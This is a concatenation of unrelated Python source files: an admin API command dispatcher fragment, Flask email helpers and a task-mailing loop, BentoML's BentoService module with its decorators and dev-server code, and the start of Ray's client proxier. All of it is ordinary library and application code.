"details": f"Ambiguous client command {cmd_name} - qualify with scope",
}
elif len(entries) == 1:
self.set_command_result(None)
ent = entries[0]
return_result = ent.handler(args, self)
result = self.get_command_result()
if return_result:
return return_result
if result is None:
return {"status": APIStatus.ERROR_RUNTIME, "details": "Client did not respond"}
return result
# check server side commands
entries = self.server_cmd_reg.get_command_entries(cmd_name)
if len(entries) <= 0:
return {
"status": APIStatus.ERROR_SYNTAX,
"details": f"Command {cmd_name} not found in server or client cmds",
}
elif len(entries) > 1:
return {
"status": APIStatus.ERROR_SYNTAX,
"details": f"Ambiguous server command {cmd_name} - qualify with scope",
}
return self.server_execute(command)
def server_execute(self, command, reply_processor=None):
if not self.server_sess_active:
return {"status": APIStatus.ERROR_INACTIVE_SESSION, "details": "API session is inactive"}
self.set_command_result(None)
start = time.time()
self._try_command(command, reply_processor)
secs = time.time() - start
usecs = int(secs * 1000000)
if self.debug:
print(f"DEBUG: server_execute Done [{usecs} usecs] {datetime.now()}")
result = self.get_command_result()
if result is None:
return {"status": APIStatus.ERROR_SERVER_CONNECTION, "details": "Server did not respond"}
if "data" in result:
for item in result["data"]:
if item["type"] == "error":
if "session_inactive" in item["data"]:
result.update({"status": APIStatus.ERROR_INACTIVE_SESSION})
elif any(
err in item["data"] for err in ("Failed to communicate with Admin Server", "wrong server")
):
result.update({"status": APIStatus.ERROR_SERVER_CONNECTION})
if "status" not in result:
result.update({"status": APIStatus.SUCCESS})
self.set_command_result(result)
return result
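# Illustrative sketch (an editorial addition, not part of the original module; the
# file paths, username, overseer agent and command string are assumptions): a typical
# secure-mode construction followed by a command round trip.
#
#     api = AdminAPI(
#         ca_cert="rootCA.pem",
#         client_cert="client.crt",
#         client_key="client.key",
#         upload_dir="transfer",
#         download_dir="transfer",
#         overseer_agent=my_overseer_agent,
#         auto_login=True,
#         user_name="admin@example.com",
#     )
#     resp = api.do_command("check_status server")
#     print(resp["status"], resp.get("details"))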
|
email.py
|
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, content):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
#msg.body = render_template(template + '.txt', **kwargs)
#msg.html = render_template(template + '.html', **kwargs)
msg.html = content
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
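# Illustrative usage sketch (an editorial addition; the recipient, subject and body
# are assumptions): send_email returns the worker thread, so callers may join it when
# delivery must finish before continuing.
#
#     thr = send_email('user@example.com', 'Welcome', '<p>Hello!</p>')
#     thr.join()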
|
__init__.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import logging
import multiprocessing
import os
import re
import subprocess
import sys
import tempfile
import threading
import uuid
from datetime import datetime
from dependency_injector.wiring import Provide, inject
from typing import List
from bentoml.adapters import BaseInputAdapter, BaseOutputAdapter, DefaultOutput
from bentoml.configuration.containers import BentoMLContainer
from bentoml.exceptions import BentoMLException, InvalidArgument, NotFound
from bentoml.saved_bundle import save_to_dir
from bentoml.saved_bundle.config import (
DEFAULT_MAX_BATCH_SIZE,
DEFAULT_MAX_LATENCY,
SavedBundleConfig,
)
from bentoml.saved_bundle.pip_pkg import seek_pip_packages
from bentoml.service.artifacts import ArtifactCollection, BentoServiceArtifact
from bentoml.service.env import BentoServiceEnv
from bentoml.service.inference_api import InferenceAPI
from bentoml.utils.hybridmethod import hybridmethod
ARTIFACTS_DIR_NAME = "artifacts"
BENTOML_RESERVED_API_NAMES = [
"index",
"swagger",
"docs",
"healthz",
"metrics",
"feedback",
]
logger = logging.getLogger(__name__)
prediction_logger = logging.getLogger("bentoml.prediction")
def validate_inference_api_name(api_name: str):
if not api_name.isidentifier():
raise InvalidArgument(
"Invalid API name: '{}', a valid identifier may only contain letters,"
" numbers, underscores and not starting with a number.".format(api_name)
)
if api_name in BENTOML_RESERVED_API_NAMES:
raise InvalidArgument(
"Reserved API name: '{}' is reserved for infra endpoints".format(api_name)
)
def validate_inference_api_route(route: str):
if re.findall(
r"[?#]+|^(//)|^:", route
): # contains '?' or '#' OR start with '//' OR start with ':'
# https://tools.ietf.org/html/rfc3986#page-22
raise InvalidArgument(
"The path {} contains illegal url characters".format(route)
)
if route in BENTOML_RESERVED_API_NAMES:
raise InvalidArgument(
"Reserved API route: '{}' is reserved for infra endpoints".format(route)
)
def api_decorator(
*args,
input: BaseInputAdapter = None,
output: BaseOutputAdapter = None,
api_name: str = None,
route: str = None,
api_doc: str = None,
mb_max_batch_size: int = DEFAULT_MAX_BATCH_SIZE,
mb_max_latency: int = DEFAULT_MAX_LATENCY,
batch=False,
**kwargs,
): # pylint: disable=redefined-builtin
"""
A decorator exposed as `bentoml.api` for defining Inference API in a BentoService
class.
:param input: InputAdapter instance of the inference API
:param output: OutputAdapter instance of the inference API
:param api_name: API name, defaults to the user-defined callback function's
name
:param route: Specify HTTP URL route of this inference API. By default,
`api.name` is used as the route. This parameter can be used for customizing
the URL route, e.g. `route="/api/v2/model_a/predict"`
Default: None (the same as api_name)
:param api_doc: user-facing documentation of the inference API, defaults to the
user-defined callback function's docstring
:param mb_max_batch_size: The maximum size of requests batch accepted by this
inference API. This parameter governs the throughput/latency trade off, and
avoids having large batches that exceed some resource constraint (e.g. GPU
memory to hold the entire batch's data). Default: 1000.
:param mb_max_latency: The latency goal of this inference API in milliseconds.
Default: 10000.
Example usage:
>>> from bentoml import BentoService, api
>>> from bentoml.adapters import JsonInput, DataframeInput
>>>
>>> class FraudDetectionAndIdentityService(BentoService):
>>>
>>> @api(input=JsonInput(), batch=True)
>>> def fraud_detect(self, json_list):
>>> # user-defined callback function that process inference requests
>>>
>>> @api(input=DataframeInput(input_json_orient='records'), batch=True)
>>> def identity(self, df):
>>> # user-defined callback function that process inference requests
"""
def decorator(func):
_api_name = func.__name__ if api_name is None else api_name
_api_route = _api_name if route is None else route
validate_inference_api_name(_api_name)
validate_inference_api_route(_api_route)
_api_doc = func.__doc__ if api_doc is None else api_doc
if input is None:
# Raise error when input adapter class passed without instantiation
if not args or not (
inspect.isclass(args[0]) and issubclass(args[0], BaseInputAdapter)
):
raise InvalidArgument(
"BentoService @api decorator first parameter must "
"be an instance of a class derived from "
"bentoml.adapters.BaseInputAdapter "
)
# noinspection PyPep8Naming
InputAdapter = args[0]
input_adapter = InputAdapter(*args[1:], **kwargs)
output_adapter = DefaultOutput()
else:
assert isinstance(input, BaseInputAdapter), (
"API input parameter must be an instance of a class derived from "
"bentoml.adapters.BaseInputAdapter"
)
input_adapter = input
output_adapter = output or DefaultOutput()
setattr(func, "_is_api", True)
setattr(func, "_input_adapter", input_adapter)
setattr(func, "_output_adapter", output_adapter)
setattr(func, "_api_name", _api_name)
setattr(func, "_api_route", _api_route)
setattr(func, "_api_doc", _api_doc)
setattr(func, "_mb_max_batch_size", mb_max_batch_size)
setattr(func, "_mb_max_latency", mb_max_latency)
setattr(func, "_batch", batch)
return func
return decorator
def web_static_content_decorator(web_static_content):
"""Define web UI static files required to be bundled with a BentoService
Args:
web_static_content: path to the directory containing index.html and the static dir
>>> @web_static_content('./ui/')
>>> class MyMLService(BentoService):
>>> pass
"""
def decorator(bento_service_cls):
bento_service_cls._web_static_content = web_static_content
return bento_service_cls
return decorator
def artifacts_decorator(artifacts: List[BentoServiceArtifact]):
"""Define artifacts required to be bundled with a BentoService
Args:
artifacts (list(bentoml.artifact.BentoServiceArtifact)): A list of desired
artifacts required by this BentoService
"""
def decorator(bento_service_cls):
artifact_names = set()
for artifact in artifacts:
if not isinstance(artifact, BentoServiceArtifact):
raise InvalidArgument(
"BentoService @artifacts decorator only accept list of "
"BentoServiceArtifact instances, instead got type: '%s'"
% type(artifact)
)
if artifact.name in artifact_names:
raise InvalidArgument(
"Duplicated artifact name `%s` detected. Each artifact within one"
"BentoService must have an unique name" % artifact.name
)
artifact_names.add(artifact.name)
bento_service_cls._declared_artifacts = artifacts
return bento_service_cls
return decorator
def env_decorator(
pip_dependencies: List[str] = None,
pip_packages: List[str] = None,
pip_index_url: str = None,
pip_trusted_host: str = None,
pip_extra_index_url: str = None,
auto_pip_dependencies: bool = None,
infer_pip_packages: bool = False,
requirements_txt_file: str = None,
conda_channels: List[str] = None,
conda_overwrite_channels: bool = False,
conda_override_channels: bool = False,
conda_dependencies: List[str] = None,
conda_env_yml_file: str = None,
setup_sh: str = None,
docker_base_image: str = None,
zipimport_archives: List[str] = None,
):
"""Define environment and dependencies required for the BentoService being created
Args:
pip_packages: list of pip packages required, specified by package name
or with specified version `{package_name}=={package_version}`
pip_dependencies: same as pip_packages but deprecated
pip_index_url: passing down to pip install --index-url option
pip_trusted_host: passing down to pip install --trusted-host option
pip_extra_index_url: passing down to pip install --extra-index-url option
infer_pip_packages: whether to automatically find all the required
pip dependencies and pin their version
auto_pip_dependencies: same as infer_pip_packages but deprecated
requirements_txt_file: path to the requirements.txt where pip dependencies
are explicitly specified, with ideally pinned versions
conda_channels: list of extra conda channels other than default channels to be
used. This is equivalent to passing the --channels to conda commands
conda_override_channels: ensures that conda searches only your specified
channel and no other channels, such as default channels.
This is equivalent to passing the --override-channels option to conda
commands, or adding `nodefaults` to the `channels` in the environment.yml
conda_overwrite_channels: aliases to `override_channels`
conda_dependencies: list of conda dependencies required
conda_env_yml_file: use a pre-defined conda environment yml file
setup_sh: user defined setup bash script, it is executed in docker build time
docker_base_image: used for customizing the docker container image built with
BentoML saved bundle. Base image must either have both `bash` and `conda`
installed; or have `bash`, `pip`, `python` installed, in which case the user
is required to ensure the python version matches the BentoService bundle
zipimport_archives: list of zipimport archives paths relative to the module path
"""
if requirements_txt_file:
if pip_packages:
logger.warning("Ignoring pip_packages as requirements_txt_file is set.")
if pip_index_url or pip_trusted_host or pip_extra_index_url:
logger.warning(
"Ignoring pip related options as requirements_txt_file is set."
)
if pip_dependencies is not None:
logger.warning(
"`pip_dependencies` parameter in `@env` is being deprecated soon, use "
"`pip_packages` instead, e.g. `@env(pip_packages=[\"numpy\"])`"
)
if auto_pip_dependencies is not None:
logger.warning(
"`auto_pip_dependencies` parameter in `@env` is being deprecated soon,"
"use `infer_pip_packages` instead, e.g. `@env(infer_pip_packages=True)`"
)
def decorator(bento_service_cls):
bento_service_cls._env = BentoServiceEnv(
pip_packages=pip_packages or pip_dependencies,
pip_index_url=pip_index_url,
pip_trusted_host=pip_trusted_host,
pip_extra_index_url=pip_extra_index_url,
infer_pip_packages=infer_pip_packages or auto_pip_dependencies,
requirements_txt_file=requirements_txt_file,
conda_channels=conda_channels,
conda_override_channels=conda_override_channels,
conda_overwrite_channels=conda_overwrite_channels,
conda_dependencies=conda_dependencies,
conda_env_yml_file=conda_env_yml_file,
setup_sh=setup_sh,
docker_base_image=docker_base_image,
zipimport_archives=zipimport_archives,
)
return bento_service_cls
return decorator
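# Illustrative sketch (an editorial addition; the package names and base image are
# assumptions): declaring the runtime environment of a service with the decorator
# defined above, imported as ``env`` as in the BentoService docstring below.
#
#     @env(
#         pip_packages=["scikit-learn==1.0.2", "pandas"],
#         conda_channels=["conda-forge"],
#         docker_base_image="python:3.8-slim",
#     )
#     class MyService(BentoService):
#         pass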
def ver_decorator(major, minor):
"""Decorator for specifying the version of a custom BentoService.
Args:
major (int): Major version number for Bento Service
minor (int): Minor version number for Bento Service
BentoML uses semantic versioning for BentoService distribution:
* MAJOR is incremented when you make breaking API changes
* MINOR is incremented when you add new functionality without breaking the
existing API or functionality
* PATCH is incremented when you make backwards-compatible bug fixes
'Patch' is provided (or auto-generated) when calling BentoService#save,
while 'Major' and 'Minor' can be defined with '@ver' decorator
>>> from bentoml import ver, artifacts
>>> from bentoml.service.artifacts.common import PickleArtifact
>>>
>>> @ver(major=1, minor=4)
>>> @artifacts([PickleArtifact('model')])
>>> class MyMLService(BentoService):
>>> pass
>>>
>>> svc = MyMLService()
>>> svc.pack("model", trained_classifier)
>>> svc.set_version("2019-08.iteration20")
>>> svc.save()
>>> # The final produced BentoService bundle will have version:
>>> # "1.4.2019-08.iteration20"
"""
def decorator(bento_service_cls):
bento_service_cls._version_major = major
bento_service_cls._version_minor = minor
return bento_service_cls
return decorator
def validate_version_str(version_str):
"""
Validate that version str format is either a simple version string that:
* Consist of only ALPHA / DIGIT / "-" / "." / "_"
* Length between 1-128
Or a valid semantic version https://github.com/semver/semver/blob/master/semver.md
"""
regex = r"[A-Za-z0-9_.-]{1,128}\Z"
semver_regex = r"^(?P<major>0|[1-9]\d*)\.(?P<minor>0|[1-9]\d*)\.(?P<patch>0|[1-9]\d*)(?:-(?P<prerelease>(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+(?P<buildmetadata>[0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$" # noqa: E501
if (
re.match(regex, version_str) is None
and re.match(semver_regex, version_str) is None
):
raise InvalidArgument(
'Invalid BentoService version: "{}", it can only consist'
' ALPHA / DIGIT / "-" / "." / "_", and must be less than'
"128 characters".format(version_str)
)
if version_str.lower() == "latest":
raise InvalidArgument('BentoService version can not be set to "latest"')
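# Illustrative sketch (an editorial addition): version strings accepted or rejected
# by validate_version_str under the rules documented above.
#
#     validate_version_str("20191009135240_D246ED")    # ok: simple version string
#     validate_version_str("1.4.2019-08.iteration20")  # ok: MAJOR.MINOR plus patch label
#     validate_version_str("latest")                   # raises InvalidArgument
#     validate_version_str("not valid!")               # raises InvalidArgument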
def save(bento_service, base_path=None, version=None, labels=None):
"""
Save and register the given BentoService via BentoML's built-in model management
system. BentoML by default keeps track of all the SavedBundle's files and metadata
in local file system under the $BENTOML_HOME(~/bentoml) directory. Users can also
configure BentoML to save their BentoService to a shared Database and cloud object
storage such as AWS S3.
:param bento_service: target BentoService instance to be saved
:param base_path: optional - override repository base path
:param version: optional - save with version override
:param labels: optional - user defined labels
:return: saved_path: file path to where the BentoService is saved
"""
logger.warning(
"`from bentoml import save` is being deprecated soon, use BentoService#save "
"and BentoService#save_to_dir instead."
)
from bentoml.yatai.client import YataiClient
from bentoml.yatai.yatai_service import get_yatai_service
if base_path:
yatai_service = get_yatai_service(file_system_directory=base_path)
yatai_client = YataiClient(yatai_service)
else:
yatai_client = YataiClient()
return yatai_client.repository.upload(bento_service, version, labels)
class BentoService:
"""
BentoService is the base component for building prediction services using BentoML.
BentoService provides an abstraction for describing the model artifacts and environment
dependencies required for a prediction service, and allows users to create inference
APIs that define the inference logic and how the underlying model can be served.
Each BentoService can contain multiple models and serve multiple inference APIs.
Usage example:
>>> from bentoml import BentoService, env, api, artifacts
>>> from bentoml.adapters import DataframeInput
>>> from bentoml.frameworks.sklearn import SklearnModelArtifact
>>>
>>> @artifacts([SklearnModelArtifact('clf')])
>>> @env(pip_packages=["scikit-learn"])
>>> class MyMLService(BentoService):
>>>
>>> @api(input=DataframeInput(), batch=True)
>>> def predict(self, df):
>>> return self.artifacts.clf.predict(df)
>>>
>>> if __name__ == "__main__":
>>> bento_service = MyMLService()
>>> bento_service.pack('clf', trained_classifier_model)
>>> bento_service.save_to_dir('/bentoml_bundles')
"""
# List of inference APIs that this BentoService provides
_inference_apis: List[InferenceAPI] = []
# Name of this BentoService. It defaults to the class name of this BentoService class
_bento_service_name: str = None
# For BentoService loaded from saved bundle, this will be set to the path of bundle.
# When user install BentoService bundle as a PyPI package, this will be set to the
# installed site-package location of current python environment
_bento_service_bundle_path: str = None
# List of artifacts required by this BentoService class, declared via the `@env`
# decorator. This list is used for initializing an empty ArtifactCollection when
# the BentoService class is instantiated
_declared_artifacts: List[BentoServiceArtifact] = []
# An instance of ArtifactCollection, containing all required trained model artifacts
_artifacts: ArtifactCollection = None
# A `BentoServiceEnv` instance specifying the required dependencies and all system
# environment setups
_env = None
# When loading BentoService from saved bundle, this will be set to the version of
# the saved BentoService bundle
_bento_service_bundle_version = None
# See `ver_decorator` function above for more information
_version_major = None
_version_minor = None
# See `web_static_content` function above for more
_web_static_content = None
def __init__(self):
# When creating BentoService instance from a saved bundle, set version to the
# version specified in the saved bundle
self._bento_service_version = self.__class__._bento_service_bundle_version
self._dev_server_bundle_path: tempfile.TemporaryDirectory = None
self._dev_server_interrupt_event: multiprocessing.Event = None
self._dev_server_process: multiprocessing.Process = None
self._config_artifacts()
self._config_inference_apis()
self._config_environments()
def _config_environments(self):
self._env = self.__class__._env or BentoServiceEnv()
for api in self._inference_apis:
self._env.add_pip_packages(api.input_adapter.pip_dependencies)
self._env.add_pip_packages(api.output_adapter.pip_dependencies)
for artifact in self.artifacts.get_artifact_list():
artifact.set_dependencies(self.env)
def _config_inference_apis(self):
self._inference_apis = []
for _, function in inspect.getmembers(
self.__class__,
predicate=lambda x: inspect.isfunction(x) or inspect.ismethod(x),
):
if hasattr(function, "_is_api"):
api_name = getattr(function, "_api_name")
route = getattr(function, "_api_route", None)
api_doc = getattr(function, "_api_doc")
input_adapter = getattr(function, "_input_adapter")
output_adapter = getattr(function, "_output_adapter")
mb_max_latency = getattr(function, "_mb_max_latency")
mb_max_batch_size = getattr(function, "_mb_max_batch_size")
batch = getattr(function, "_batch")
# Bind api method call with self(BentoService instance)
user_func = function.__get__(self)
self._inference_apis.append(
InferenceAPI(
self,
api_name,
api_doc,
input_adapter=input_adapter,
user_func=user_func,
output_adapter=output_adapter,
mb_max_latency=mb_max_latency,
mb_max_batch_size=mb_max_batch_size,
batch=batch,
route=route,
)
)
def _config_artifacts(self):
self._artifacts = ArtifactCollection.from_declared_artifact_list(
self._declared_artifacts
)
if self._bento_service_bundle_path:
# For pip installed BentoService, artifacts directory is located at
# 'package_path/artifacts/', but for loading from bundle directory, it is
# in 'path/{service_name}/artifacts/'
if os.path.isdir(
os.path.join(self._bento_service_bundle_path, ARTIFACTS_DIR_NAME)
):
artifacts_path = os.path.join(
self._bento_service_bundle_path, ARTIFACTS_DIR_NAME
)
else:
artifacts_path = os.path.join(
self._bento_service_bundle_path, self.name, ARTIFACTS_DIR_NAME
)
self.artifacts.load_all(artifacts_path)
@property
def inference_apis(self) -> List[InferenceAPI]:
"""Return a list of user defined API functions
Returns:
list(InferenceAPI): List of Inference API objects
"""
return self._inference_apis
def get_inference_api(self, api_name):
"""Find the inference API in this BentoService with a specific name.
When the api_name is None, this returns the first Inference API found in the
`self.inference_apis` list.
:param api_name: the target Inference API's name
:return:
"""
if api_name:
try:
return next(
(api for api in self.inference_apis if api.name == api_name)
)
except StopIteration:
raise NotFound(
"Can't find API '{}' in service '{}'".format(api_name, self.name)
)
elif len(self.inference_apis) > 0:
return self.inference_apis[0]
else:
raise NotFound(f"Can't find any inference API in service '{self.name}'")
@property
def artifacts(self):
""" Returns the ArtifactCollection instance specified with this BentoService
class
Returns:
artifacts(ArtifactCollection): A dictionary of packed artifacts from the
artifact name to the BentoServiceArtifact instance
"""
return self._artifacts
@property
def env(self):
return self._env
@property
def web_static_content(self):
return self._web_static_content
def get_web_static_content_path(self):
if not self.web_static_content:
return None
if self._bento_service_bundle_path:
return os.path.join(
self._bento_service_bundle_path, self.name, 'web_static_content',
)
else:
return os.path.join(os.getcwd(), self.web_static_content)
@hybridmethod
@property
def name(self):
"""
:return: BentoService name
"""
return self.__class__.name # pylint: disable=no-value-for-parameter
@name.classmethod
@property
def name(cls): # pylint: disable=no-self-argument,invalid-overridden-method
"""
:return: BentoService name
"""
if cls._bento_service_name is not None:
if not cls._bento_service_name.isidentifier():
raise InvalidArgument(
'BentoService#_bento_service_name must be a valid python identifier '
'matching regex `(letter|"_")(letter|digit|"_")*`'
)
return cls._bento_service_name
else:
# Use python class name as service name
return cls.__name__
def set_version(self, version_str=None):
"""Set the version of this BentoService instance. Once the version is set
explicitly via `set_version`, the `self.versioneer` method will no longer be
invoked when saving this BentoService.
"""
if version_str is None:
version_str = self.versioneer()
if self._version_major is not None and self._version_minor is not None:
# BentoML uses semantic versioning for BentoService distribution
# when user specified the MAJOR and MINOR version number along with
# the BentoService class definition with '@ver' decorator.
# The parameter version(or auto generated version) here will be used as
# PATCH field in the final version:
version_str = ".".join(
[str(self._version_major), str(self._version_minor), version_str]
)
validate_version_str(version_str)
if self.__class__._bento_service_bundle_version is not None:
logger.warning(
"Overriding loaded BentoService(%s) version:%s to %s",
self.__class__._bento_service_bundle_path,
self.__class__._bento_service_bundle_version,
version_str,
)
self.__class__._bento_service_bundle_version = None
if (
self._bento_service_version is not None
and self._bento_service_version != version_str
):
logger.warning(
"Resetting BentoService '%s' version from %s to %s",
self.name,
self._bento_service_version,
version_str,
)
self._bento_service_version = version_str
return self._bento_service_version
def versioneer(self):
"""
Function used to generate a new version string when saving a new BentoService
bundle. User can also override this function to get a customized version format
"""
datetime_string = datetime.now().strftime("%Y%m%d%H%M%S")
random_hash = uuid.uuid4().hex[:6].upper()
# Example output: '20191009135240_D246ED'
return datetime_string + "_" + random_hash
@property
def version(self):
"""
Return the version of this BentoService. If the version of this BentoService has
not been set explicitly via `self.set_version`, a new version will be generated
with the `self.versioneer` method. User can customize this version str either by
setting the version with `self.set_version` before a `save` call, or override
the `self.versioneer` method to customize the version str generator logic.
For BentoService loaded from a saved bundle, this will simply return the version
information found in the saved bundle.
:return: BentoService version str
"""
if self.__class__._bento_service_bundle_version is not None:
return self.__class__._bento_service_bundle_version
if self._bento_service_version is None:
self.set_version(self.versioneer())
return self._bento_service_version
@property
def tag(self):
"""
Bento tag is simply putting its name and version together, separated by a colon
`tag` is mostly used in Yatai model management related APIs and operations
"""
return f"{self.name}:{self.version}"
def save(self, yatai_url=None, version=None, labels=None):
"""
Save and register this BentoService via BentoML's built-in model management
system. BentoML by default keeps track of all the SavedBundle's files and
metadata in local file system under the $BENTOML_HOME(~/bentoml) directory.
Users can also configure BentoML to save their BentoService to a shared Database
and cloud object storage such as AWS S3.
:param yatai_url: optional - URL path to Yatai server
:param version: optional - save with version override
:param labels: optional - labels dictionary
:return: saved_path: file path to where the BentoService is saved
"""
from bentoml.yatai.client import get_yatai_client
yc = get_yatai_client(yatai_url)
return yc.repository.upload(self, version, labels)
def save_to_dir(self, path, version=None):
"""Save this BentoService along with all its artifacts, source code and
dependencies to target file path, assuming path exist and empty. If target path
is not empty, this call may override existing files in the given path.
:param path (str): Destination of where the bento service will be saved
:param version: optional - save with version override
"""
return save_to_dir(self, path, version)
@hybridmethod
def pack(self, name, *args, **kwargs):
"""
BentoService#pack method is used for packing trained model instances with a
BentoService instance, making it ready for BentoService#save.
pack(name, *args, **kwargs):
:param name: name of the declared model artifact
:param args: args passing to the target model artifact to be packed
:param kwargs: kwargs passing to the target model artifact to be packed
:return: this BentoService instance
"""
self.artifacts.get(name).pack(*args, **kwargs)
return self
@pack.classmethod
def pack(cls, *args, **kwargs): # pylint: disable=no-self-argument
"""
**Deprecated**: Legacy `BentoService#pack` class method, no longer supported
"""
raise BentoMLException(
"BentoService#pack class method is deprecated, use instance method `pack` "
"instead. e.g.: svc = MyBentoService(); svc.pack('model', model_object)"
)
def get_bento_service_metadata_pb(self):
return SavedBundleConfig(self).get_bento_service_metadata_pb()
pip_dependencies_map = None
def start_dev_server(self, port=None, enable_ngrok=False, debug=False):
if self._dev_server_process:
logger.warning(
"There is already a running dev server, "
"please call `service.stop_dev_server()` first."
)
return
try:
self._dev_server_bundle_path = tempfile.TemporaryDirectory()
self.save_to_dir(self._dev_server_bundle_path.name)
def print_log(p):
for line in p.stdout:
print(line.decode(), end='')
def run(path, interrupt_event):
my_env = os.environ.copy()
# my_env["FLASK_ENV"] = "development"
cmd = [sys.executable, "-m", "bentoml", "serve"]
if port:
cmd += ['--port', f'{port}']
if enable_ngrok:
cmd += ['--run-with-ngrok']
if debug:
cmd += ['--debug']
cmd += [path]
p = subprocess.Popen(
cmd,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
env=my_env,
)
threading.Thread(target=print_log, args=(p,), daemon=True).start()
interrupt_event.wait()
p.terminate()
self._dev_server_interrupt_event = multiprocessing.Event()
self._dev_server_process = multiprocessing.Process(
target=run,
args=(
self._dev_server_bundle_path.name,
self._dev_server_interrupt_event,
),
daemon=True,
)
self._dev_server_process.start()
logger.info(
f"======= starting dev server on port: {port if port else 5000} ======="
)
except Exception as e: # pylint: disable=broad-except
self.stop_dev_server(skip_log=True)
raise e
def stop_dev_server(self, skip_log=False):
if self._dev_server_interrupt_event:
self._dev_server_interrupt_event.set()
self._dev_server_interrupt_event = None
if self._dev_server_process:
self._dev_server_process.join()
assert not self._dev_server_process.is_alive()
self._dev_server_process = None
logger.info("Dev server has stopped.")
elif not skip_log:
logger.warning("No dev server is running.")
if self._dev_server_bundle_path:
self._dev_server_bundle_path.cleanup()
self._dev_server_bundle_path = None
def __del__(self):
if hasattr(self, "_dev_server_interrupt_event"): # __init__ may not be called
self.stop_dev_server(skip_log=True)
@inject
def infer_pip_dependencies_map(
self,
bentoml_version: str = Provide[
BentoMLContainer.bento_bundle_deployment_version
],
):
if not self.pip_dependencies_map:
self.pip_dependencies_map = {}
bento_service_module = sys.modules[self.__class__.__module__]
if hasattr(bento_service_module, "__file__"):
bento_service_py_file_path = bento_service_module.__file__
reqs, unknown_modules = seek_pip_packages(bento_service_py_file_path)
self.pip_dependencies_map.update(reqs)
for module_name in unknown_modules:
logger.warning(
"unknown package dependency for module: %s", module_name
)
# Reset bentoml to the configured deploy version - this is for users who
# develop against a customized BentoML branch but deploy with a different
# stable version.
#
# For example, a BentoService created from a local dirty branch would fail
# to deploy with Docker because that version can't be found on PyPI;
# get_bentoml_deploy_version gives the user the latest released PyPI
# version closest to the `dirty` branch.
self.pip_dependencies_map['bentoml'] = bentoml_version
return self.pip_dependencies_map
|
tasks.py
|
# import os
# import sys
# sys.path.insert(0, os.getcwd())
from manage import app as application
app_context = application.app_context()
app_context.push()
from app import db
from app import mail
from app.models import Task
import time
from datetime import datetime
from threading import Thread
from flask import current_app
from flask_mail import Message
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, **kw):
app = current_app._get_current_object()
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
stub = """
<body>
<h1>Question</h1>
<div class="question">
{question}
</div>
<h1>Answer</h1>
<details class="question">
{answer}
</details>
</body>
"""
msg.body = stub.format(subject=subject, question=kw['question'],
answer=kw['answer']).encode('utf-8')
msg.html = stub.format(subject=subject, question=kw['question'],
answer=kw['answer']).encode('utf-8')
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
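# Note: sending happens on a background thread so the polling loop in main()
# is not blocked by SMTP latency; the returned Thread handle lets a caller
# join() if it needs delivery to finish before moving on.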
def get_tasks():
return db.session.query(Task).filter(
Task.start_timestamp < datetime.now()).all()
def main():
while True:
for task in get_tasks():
to = task.post.author.email
subject = task.post.question
kw = dict(
question=task.post.question_html,
answer=task.post.answer_html
)
send_email(to, subject, **kw)
db.session.delete(task)
db.session.commit()
time.sleep(60)
if __name__ == '__main__':
main()
|
proxier.py
|
import atexit
from concurrent import futures
from dataclasses import dataclass
import grpc
import logging
from itertools import chain
import json
import socket
import sys
from threading import Lock, Thread, RLock
import time
import traceback
from typing import Any, Callable, Dict, List, Optional, Tuple
import ray
from ray.cloudpickle.compat import pickle
from ray.job_config import JobConfig
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
from ray.util.client.common import (ClientServerHandle,
CLIENT_SERVER_MAX_THREADS, GRPC_OPTIONS)
from ray._private.parameter import RayParams
from ray._private.services import ProcessInfo, start_ray_client_server
from ray._private.utils import detect_fate_sharing_support
# Import psutil after ray so the packaged version is used.
import psutil
logger = logging.getLogger(__name__)
CHECK_PROCESS_INTERVAL_S = 30
MIN_SPECIFIC_SERVER_PORT = 23000
MAX_SPECIFIC_SERVER_PORT = 24000
CHECK_CHANNEL_TIMEOUT_S = 10
LOGSTREAM_RETRIES = 5
LOGSTREAM_RETRY_INTERVAL_SEC = 2
def _get_client_id_from_context(context: Any) -> str:
"""
Get `client_id` from gRPC metadata. If the `client_id` is not present,
this function logs an error and sets the status_code.
"""
metadata = {k: v for k, v in context.invocation_metadata()}
client_id = metadata.get("client_id") or ""
if client_id == "":
logger.error("Client connecting with no client_id")
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
return client_id
@dataclass
class SpecificServer:
port: int
process_handle_future: futures.Future
channel: "grpc._channel.Channel"
def wait_ready(self, timeout: Optional[float] = None) -> None:
"""
Wait for the server to actually start up.
"""
res = self.process_handle_future.result(timeout=timeout)
if res is None:
# This is only set to None when server creation specifically fails.
raise RuntimeError("Server startup failed.")
def poll(self) -> Optional[int]:
"""Check if the process has exited."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
return proc.process.poll()
except futures.TimeoutError:
return
def kill(self) -> None:
"""Try to send a KILL signal to the process."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
proc.process.kill()
except futures.TimeoutError:
# Server has not been started yet.
pass
def set_result(self, proc: Optional[ProcessInfo]) -> None:
"""Set the result of the internal future if it is currently unset."""
if not self.process_handle_future.done():
self.process_handle_future.set_result(proc)
